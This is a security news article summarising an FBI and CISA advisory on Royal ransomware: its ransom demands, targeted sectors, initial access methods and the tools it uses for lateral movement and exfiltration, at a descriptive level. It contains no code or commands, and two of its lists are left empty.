The collaborative efforts of the FBI and CISA have resulted in the creation and distribution of a comprehensive Cybersecurity Advisory (CSA) revealing that the threat actors behind the Rayal ransomware made up to $11 million in Crypto.
This advisory has been designed to share crucial information on the Royal ransomware threat and its associated IOCs and TTPs.
The FBI’s dedicated threat response activities have identified these IOCs and TTPs recently in January 2023, and the CSA aims to share this information to help organizations protect themselves against this malicious threat.
A new variant of Royal ransomware has been used by cybercriminals to breach the security of both US-based and foreign organizations since around September 2022.
The FBI and CISA believe that the custom-built file encryption program utilized by a particular ransomware variant is an evolved version of previous iterations that employed a loader known as “Zeon.”
Action Flow
The modus operandi of the Royal ransomware involves disabling the antivirus software of targeted organizations after breaching their network security.
As a result, considerable amounts of data are exfiltrated by attackers prior to the final deployment of the ransomware and encryption of the computers that are affected.
The operators of the Royal ransomware have demanded payment of a ransom in Bitcoin from their victims. These ransom demands have varied between roughly $1 million and $11 million USD, depending on the targeted organization’s size and level of sensitivity of the stolen data.
Based on recorded incidents, it has been observed that the perpetrators behind the Royal ransomware do not provide ransom amounts and payment details in their initial ransom notes.
Instead, they engage in direct negotiations with the victims through a .onion URL after gaining their attention via the ransom note.
Critical Infrastructure Sectors Targeted
The Royal ransomware has specifically aimed at compromising a broad range of critical infrastructure sectors, which include:-
- Manufacturing
- Communications
- Healthcare and Public Healthcare (HPH)
- Education
Technical Analysis
Aside from the primary function of encrypting data, the individuals behind the Royal ransomware have also employed double extortion tactics.
While the Royal ransomware operators employ multiple techniques to gain initial access to their target networks, which include:-
- Phishing
- Remote Desktop Protocol (RDP)
- Public-facing applications
- Brokers
After successfully breaching a target network, the perpetrators establish communication with their C2 infrastructure. Subsequently, they download several tools to execute their attack strategy on the compromised systems.
The attackers have repurposed valid Windows software to their advantage in strengthening their foothold in the targeted network. They utilize this technique to evade detection by security protocols and to facilitate a further compromise of the victim’s network.
Recent observations have indicated that the perpetrators of the Royal ransomware have begun to use Chisel, as a means of communicating with their command and control (C2) infrastructure.
The Royal ransomware operators have employed several command-and-control (C2) servers that have previously been linked to Qakbot malware in their attacks. However, it is not yet clear if the Royal ransomware exclusively relies on the Qakbot infrastructure for its operations.
In accordance with their further compromising step, threat actors move laterally across the network with the help of RDP or RMM tools like:-
- AnyDesk
- LogMeIn
- Atera
Afterward, they use pen-testing and malware tools in order to exfiltrate data from victim networks, such as:-
The Cobalt Strike program is subsequently repurposed for the purposes of aggregating and exfiltrating data.
During the month of January 2023, the Royal ransomware was reportedly associated with 19 attacks, placing it behind other ransomware families such as:-
Recent reports indicate that Royal ransomware has advanced its capabilities and can now target both Windows and Linux environments. This suggests that the attackers are adapting and evolving their tactics to expand the scope of their attacks.
While this expanded capability could potentially lead to a wider range of targets for the attackers to compromise.
Network Security Checklist – Download Free E-Book